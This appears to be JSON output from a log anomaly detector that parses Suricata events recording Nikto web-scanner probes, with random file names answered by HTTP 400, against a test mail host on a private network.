"/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.no", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46836, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":770079030141252,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 770079030141252, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.222542+0000\",\"flow_id\":770079030141252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.224080 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46838 -> 192.168.10.154:80", "/parser/model/time": 1583349514.22408, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46838, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.224080 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46838 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.shtml", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.224312+0000\",\"flow_id\":1783781506312318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.224312, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1783781506312318,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.shtml\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.shtml\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.shtml", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.shtml", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46838, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1783781506312318,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1783781506312318, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.224312+0000\",\"flow_id\":1783781506312318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.226910 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46840 -> 192.168.10.154:80", "/parser/model/time": 1583349514.22691, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46840, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.226910 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46840 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.shm", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.227159+0000\",\"flow_id\":1061372302094328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.227159, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1061372302094328,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.shm\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.shm\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.shm", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.shm", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46840, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1061372302094328,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1061372302094328, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.227159+0000\",\"flow_id\":1061372302094328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46840,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shm\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shm\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.229413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46842 -> 192.168.10.154:80", "/parser/model/time": 1583349514.229413, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46842, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.229413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46842 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.btr", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.229692+0000\",\"flow_id\":1638959504063480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.229692, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1638959504063480,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.btr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46842,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.btr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", 